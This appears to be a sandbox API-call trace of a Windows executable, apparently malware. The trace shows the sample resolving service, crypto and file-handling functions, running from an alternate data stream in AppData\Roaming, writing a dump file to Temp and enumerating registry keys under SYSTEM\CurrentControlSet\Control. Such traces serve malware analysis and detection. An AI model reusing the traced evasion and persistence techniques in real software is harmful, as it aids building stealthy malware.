[0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0063.259] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0063.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0063.261] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0063.262] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0063.263] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0063.264] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0063.265] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0063.265] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0063.265] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0063.265] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0063.265] GetProcAddress (hModule=0x77710000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x7771a97d [0063.265] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0063.265] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0063.265] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0063.265] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthority") returned 0x77720e24 [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthorityCount") returned 0x77720e0c [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceCtrlDispatcherW") returned 0x7771a965 [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="SetServiceStatus") returned 0x7771c7a6 [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0063.266] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0063.267] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0063.267] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0063.267] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceW") returned 0x77717974 [0063.267] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0063.267] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0063.267] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceW") returned 0x7773712c [0063.287] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0063.287] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatusEx") returned 0x7771798c [0063.288] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyW") returned 0x7772445b [0063.288] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0063.288] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0063.288] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0063.292] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0063.293] VirtualProtect (in: lpAddress=0x401000, dwSize=0x7967, flNewProtect=0x210160, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0063.322] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe76, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0063.323] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x210148, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0063.323] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0063.323] VirtualProtect (in: lpAddress=0x410000, dwSize=0x944, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0063.325] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0063.325] GetProcessHeap () returned 0x620000 [0063.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x46c4) returned 0x6352e8 [0063.360] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0x66a8d3c0, dwHighDateTime=0x1d64a6c)) [0063.360] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0063.360] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=18365072240) returned 1 [0063.361] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c [0063.361] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0063.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6399b8 [0063.361] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x6399b8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\boot:bin")) returned 0x36 [0063.361] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin", lpEnd=0x0, wMatch=0x5c) returned="\\Boot:bin" [0063.361] lstrlenW (lpString="Boot:bin") returned 8 [0063.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x634bf0 [0063.362] PathFindExtensionW (pszPath="Boot:bin") returned="" [0063.362] StrChrW (lpStart="Boot:bin", wMatch=0x3a) returned=":bin" [0063.362] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0063.397] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0063.397] lstrlenW (lpString="Boot") returned 4 [0063.398] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0063.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x63ae10 [0063.398] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x63ae10, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0063.398] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="Boot" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Boot") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Boot" [0063.398] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Boot", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Boot.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Boot.dmp" [0063.398] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Boot.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\boot.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0063.429] SetFilePointer (in: hFile=0xa0, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0063.430] SetEndOfFile (hFile=0xa0) returned 1 [0063.430] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x401af6) returned 0x0 [0063.431] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0xa4) returned 0x0 [0063.431] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0063.431] lstrlenW (lpString="ACPI") returned 4 [0063.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x639bc8 [0063.432] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0063.432] lstrlenW (lpString="AGP") returned 3 [0063.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x639be8 [0063.432] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0063.432] lstrlenW (lpString="AppID") returned 5 [0063.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x639c08 [0063.432] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0063.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x639da8 [0063.463] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0063.463] lstrlenW (lpString="Arbiters") returned 8 [0063.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x6342e8 [0063.463] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0063.463] lstrlenW (lpString="BackupRestore") returned 13 [0063.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x634310 [0063.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x634338 [0063.463] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0063.463] lstrlenW (lpString="Class") returned 5 [0063.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x639dc8 [0063.463] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0063.463] lstrlenW (lpString="CMF") returned 3 [0063.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x639de8 [0063.463] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0063.463] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0063.463] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0063.463] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0063.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x63b2c0 [0063.464] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x634360 [0063.464] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x22) returned 0x63b2e0 [0063.464] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0063.464] lstrlenW (lpString="COM Name Arbiter") returned 16 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b310 [0063.464] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0063.464] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0063.464] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b330 [0063.464] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x634388 [0063.464] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0063.464] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0063.464] lstrlenW (lpString="ComputerName") returned 12 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x6343b0 [0063.464] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b368 [0063.464] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0063.464] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0063.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b368 | out: hHeap=0x620000) returned 1 [0063.464] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0063.464] lstrlenW (lpString="ContentIndex") returned 12 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x6343d8 [0063.465] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0063.465] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0063.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b368 [0063.465] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0063.465] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0063.465] lstrlenW (lpString="CrashControl") returned 12 [0063.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b388 [0063.465] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0063.465] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0063.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x634400 [0063.465] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0063.465] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0063.465] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0063.465] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0063.465] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0063.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x634428 [0063.465] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0063.465] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0063.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x634450 [0063.465] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0063.465] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0063.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634450 | out: hHeap=0x620000) returned 1 [0063.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x634450 [0063.465] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0063.465] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0063.465] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0063.465] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0063.466] lstrlenW (lpString="Cryptography") returned 12 [0063.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x26) returned 0x63bb50 [0063.466] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0063.466] lstrlenW (lpString="DeviceClasses") returned 13 [0063.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x634478 [0063.466] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0063.466] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0063.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634478 | out: hHeap=0x620000) returned 1 [0063.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x634478 [0063.466] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0063.466] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0063.466] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0063.466] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0063.466] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0063.466] lstrlenW (lpString="DeviceOverrides") returned 15 [0063.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x6344a0 [0063.466] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0063.466] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0063.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6344a0 | out: hHeap=0x620000) returned 1 [0063.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6344a0 [0063.466] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0063.466] lstrlenW (lpString="Diagnostics") returned 11 [0063.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x63bb80 [0063.466] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0063.466] lstrlenW (lpString="Els") returned 3 [0063.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b3a8 [0063.466] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0063.467] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0063.467] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0063.467] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0063.467] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0063.467] lstrlenW (lpString="Errata") returned 6 [0063.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x6344c8 [0063.467] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0063.467] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0063.467] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0063.467] lstrlenW (lpString="FileSystem") returned 10 [0063.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b3c8 [0063.467] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0063.467] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0063.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x6344f0 [0063.467] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0063.467] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0063.467] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0063.467] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0063.467] lstrlenW (lpString="FileSystemUtilities") returned 19 [0063.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b3e8 [0063.467] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0063.467] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0063.467] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0063.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b3e8 | out: hHeap=0x620000) returned 1 [0063.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x634518 [0063.467] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0063.467] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0063.467] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0063.467] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0063.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634518 | out: hHeap=0x620000) returned 1 [0063.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x634518 [0063.468] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0063.468] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0063.468] lstrlenW (lpString="GraphicsDrivers") returned 15 [0063.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x634540 [0063.468] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0063.468] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0063.468] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0063.468] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0063.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x634568 [0063.468] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0063.468] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0063.468] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0063.468] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0063.468] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0063.468] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0063.468] lstrlenW (lpString="GroupOrderList") returned 14 [0063.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b3e8 [0063.468] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0063.468] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0063.468] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0063.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b408 [0063.468] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0063.468] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0063.468] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0063.468] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0063.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b428 [0063.468] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0063.468] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0063.468] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0063.468] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0063.469] lstrlenW (lpString="HAL") returned 3 [0063.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b448 [0063.469] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0063.469] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0063.469] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0063.469] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0063.469] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0063.469] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 